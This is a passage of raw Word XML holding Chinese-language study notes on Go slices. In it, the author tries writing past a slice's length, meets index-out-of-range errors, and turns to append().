          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C97F24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var identifier []type=make([]int,2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1F2BF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6A329" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make([]type,length,capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E2793" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010F769" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F05C26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610BF1F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DD072" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E425EBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>这个几乎和数组一样</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>这个几乎和数组一样</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  length=3 capacity=3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73392A69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    s:=[]int{1,2,3};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CEF5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381787F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    b:=[]int{1,2,4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C71B90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>将数组赋给一个切片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66795C8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    c:=b[:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E03CCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D896B6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>直接初始化切片</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>能修改其中的值吗？通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s[0]=123; </w:t>
      </w:r>
      <w:r>
        <w:t>这种方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEAFE1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51230C8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A566A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FB797" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    s:=[]int{1,2};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12C1B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    s[0]=123;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D9917" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fmt.Println("%v",s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4206CF83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53AB5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态的往切片当中添加数据看会发生什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1A8F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1AC1B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86BB70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED17A61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    s:=[]int{1,2};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155081AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    i:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8BAAA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10000;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251EBC96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        s[i]=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273579E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499210E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10000;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039EFEB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Println("i %v,v %v",i,s[i])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E0D3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ED2CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599BCB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哇</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现已经初始化了的切片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>往其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入超过原来容器的长度的数据会提示错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组角标越界的问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8B14F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE709D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个也很好理解，一开始都初始化了都定义了，都明知道长度了，还要使用未知角标当然报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70D3AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F75363D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改代码再试一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有一开始初始化的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAEAA50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC884F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A209FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33661E54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var s []int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA65A2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    i:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE4C22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10000;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BA1D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        s[i]=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111BDD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510BDB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("%v",s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A5FAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26458688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5446CD99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>还是报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原来踩雷了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个是空切片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啥也没指定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A3748" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293790B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再修改代码试试，声明后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B66702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="179AA4FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7B7DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D150666" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA37FF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>var s []int=make([]int,2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7061B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    i:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61C4E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10000;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CAE14D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        s[i]=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72322096" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818FDA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("%v",s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C6A297" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C584EEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D8AC4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卧槽还是不行什么鬼？后续通过查看文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原来有专用的方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> append()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>往其中添加元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D569D21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED6B355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再在修改代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAB47F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DB4646" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23D8F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D47B7BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53602A5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    s:=make([]int,2);</w:t>
